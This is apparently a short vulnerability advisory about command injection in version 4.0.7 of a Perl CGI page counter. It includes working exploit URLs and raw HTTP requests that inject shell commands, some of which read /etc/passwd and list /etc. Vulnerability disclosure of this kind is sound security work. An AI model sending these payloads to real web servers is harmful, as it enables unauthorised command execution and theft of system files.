A popular CGI web page acess counter, version 4.0.7 by George Burgyan permits execution of arbitrary commands as a result of unchecked user input. Commands are executed as the same permission of the webserver.
94ace7ee3453cc97474d0f764a764949d5e6287f3e4ff04fcae1b290ca7c34b5
The popular CGI web page access counter version 4.0.7 by George
Burgyan allows execution of arbitrary commands due to unchecked
user input. Commands are executed with the same privilege as
the web server. Of course, other exploits can be used to get
root access on an unpatched OS.
The counter consists of a perl script called "counter", and
multiple links to counter called counter-ord, counterfiglet,
counterfiglet-ord, counterbanner, and counterbanner-ord. The
following examples illustrate how they can be exploited:
Using straight URL
------------------
http://web-server/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
Passing commands in a variable
------------------------------
> telnet web-server www
GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20"$HTTP_X" HTTP/1.0
X: pwd;ls -la /etc;cat /etc/passwd
> telnet web-server www
GET /cgi-bin/counter/nl/ord/lang=english(1);system("$ENV{HTTP_X}"); HTTP/1.0
X: echo;id;uname -a;w
The counter was last updated in 1995 so is probably no longer
supported. Links and email addresses referenced in the source
code are no longer valid. However, it appears to still be widely
used based on the number of references returned by search engine
queries.
Howard Kash